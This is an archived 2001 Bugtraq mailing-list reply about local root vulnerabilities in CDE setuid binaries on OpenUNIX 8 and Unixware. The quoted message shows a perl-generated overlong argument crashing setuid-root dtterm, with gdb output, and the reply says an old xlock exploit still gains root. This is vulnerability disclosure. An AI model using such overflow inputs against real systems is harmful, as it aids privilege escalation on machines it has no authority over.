[22784] in bugtraq
Re: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (Aycan Irican)
Wed Oct 3 17:43:29 2001
Message-ID: <3BBB518E.8020503@prosoft.com.tr>
Date: Wed, 03 Oct 2001 20:57:34 +0300
From: Aycan Irican <aycan@prosoft.com.tr>
To: KF <dotslash@snosoft.com>
Cc: bugtraq@securityfocus.com
Yes, I read yours... It looks like it's a multiple-vendor shared
library (libDtTerm.so) problem to me.

Also, Caldera must supply a patch for the OpenUNIX 8 xlock vulnerability. I
sent a mail to "security-alert" a few days ago about the xlock vulnerability,
but they told me that they put out an unofficial patch for Unixware 7;
OpenUNIX 8 is still VULNERABLE (the patch is not applicable on OpenUNIX 8). I
think this is a serious bug.

For example, I remember that earlier, in 1999, K2 released an exploit for the
Unixware 7 xlock vulnerability, and any standard user who can make a
little modification gets root access on OpenUNIX 8 TODAY (I got root).
Hey man, the exploit is around 2 years old and it worked.
KF wrote:
>This goes along with a mailing from earlier this morning ... I stated that
>I was able to make ALL suid / sgid dt* files core dump except the dtmail
>binary...
>-KF
>
>Aycan Irican wrote:
>
>>-----BEGIN PGP SIGNED MESSAGE-----
>>Hash: SHA1
>>
>>Another dt series bug...
>>
>>$ uname -a
>>OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
>>$ id
>>uid=101(fixxxer) gid=1(other)
>>$ ls -al /usr/dt/bin/dtterm
>>-r-sr-xr-x 1 root bin 60892 Haz 10 05:03 /usr/dt/bin/dtterm
>>$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
>>Warning: Missing charsets in String to FontSet conversion
>>Warning: Missing charsets in String to FontSet conversion
>>Memory fault
>>
>> # /usr/gnu/bin/gdb /usr/dt/bin/dtterm
>>(no debugging symbols found)...
>>(gdb) set args -tn `perl -e 'print "A"x1040'`
>>(gdb) run
>>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
>>(no debugging symbols found)...(no debugging symbols found)...
>>...
>>..
>>[New LWP 2]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>>0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1
>>[New Thread 1]
>>(gdb)set args -tn `perl -e 'print "A"x1042'`
>>(gdb) run
>>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'`
>>(no debugging symbols found)...(no debugging symbols found)...
>>[New LWP 2]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>>0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1
>>[New Thread 1]
>>(gdb)q
>>
>>self-explained...
>>enjoy...
>>
>>- --
>>Aycan Irican
>>Systems Engineer
>>Prosoft Communication Systems Ltd.
>>Resit Galip Cad. 85/2 Gaziosmanpaşa 06700 Ankara
>>Tel:+90-312-446-6616 Fax:+90-312-446-2423
>>-----BEGIN PGP SIGNATURE-----
>>Version: GnuPG v1.0.6 (GNU/Linux)
>>Comment: For info see http://www.gnupg.org
>>
>>iD8DBQE7uVaiJZJwgy0AK78RAsbKAJ0Y8YiCi+yagy2ep42v8wfsu+dsFQCdFIUt
>>5M67ZahjhrfqnvdlMsqE4SM=
>>=CNXa
>>-----END PGP SIGNATURE-----
>>